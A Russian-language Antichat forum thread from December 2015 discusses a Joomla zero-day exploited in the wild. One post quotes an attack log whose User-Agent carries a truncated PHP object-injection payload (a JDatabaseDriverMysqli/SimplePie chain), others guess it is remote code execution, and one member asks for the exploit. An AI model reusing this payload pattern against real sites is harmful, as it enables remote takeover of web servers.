HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Мировые новости. Обсуждения.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.12.2015, 14:40
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

С 12 декабря inthewild

Больше инфы https://xakep.ru/2015/12/15/joomla-0day/
 
Ответить с цитированием

  #2  
Старый 15.12.2015, 15:13
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

И что он делает, нихуя не понял если честно

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]2015 Dec 12 16[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]07 clienyhidden[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]access[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]log
Src IP
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]74.3.170.33[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]CAN[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]Alberta
74.3.170.33 – –
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]Dec[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2015[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0500[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]“GET[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]contact[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1″ 403 5322 “http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..
[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22fc[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22JSimplepieFactory[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]: .. {}[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0disconnectHandlers[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:{[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]:{[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22SimplePie[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]:..
{[/
COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22sanitize[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22JDatabaseDriverMysql[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:{}[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22feed_url[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60[/COLOR][COLOR="#007700"]:..[/COLOR][/COLOR
это что
 
Ответить с цитированием

  #3  
Старый 15.12.2015, 15:14
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
С нами: 8953911

Репутация: 0
По умолчанию

Кто нибудь ловил уже в логах?
 
Ответить с цитированием

  #4  
Старый 15.12.2015, 15:14
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию

по-моему, проще посмотреть что фиксили разработчики джумлы, чтобы понять откуда ноги растут)
 
Ответить с цитированием

  #5  
Старый 15.12.2015, 15:19
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от Rebz  

по-моему, проще посмотреть что фиксили разработчики джумлы, чтобы понять откуда ноги растут)
дай пожалуйста эксплоит
 
Ответить с цитированием

  #6  
Старый 15.12.2015, 15:22
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
С нами: 8953911

Репутация: 0
По умолчанию

Я так понял не фильтруются значения user agent'a при записи сессии в базу... хотя могу ошибаться.
 
Ответить с цитированием

  #7  
Старый 15.12.2015, 15:26
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от ZodiaX  

Я так понял не фильтруются значения user agent'a при записи сессии в базу... хотя могу ошибаться.
ну а что там, sql или rce или ещё что-то, в каком виде менять значение итд . ничего конкректного нету
 
Ответить с цитированием

  #8  
Старый 15.12.2015, 15:38
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
С нами: 8953911

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  

ну а что там, sql или rce или ещё что-то, в каком виде менять значение итд . ничего конкректного нету
rce, а вот самого эксплойта нету.

ps: https://github.com/rapid7/metasploit...rk/issues/6347
 
Ответить с цитированием

  #9  
Старый 15.12.2015, 19:41
VY_CMa
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами: 7552406

Репутация: 724


По умолчанию

Цитата:
Сообщение от ZodiaX  

rce, а вот самого эксплойта нету.
ps:
https://github.com/rapid7/metasploit...rk/issues/6347
/threads/50600/page-16#post-3927817
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.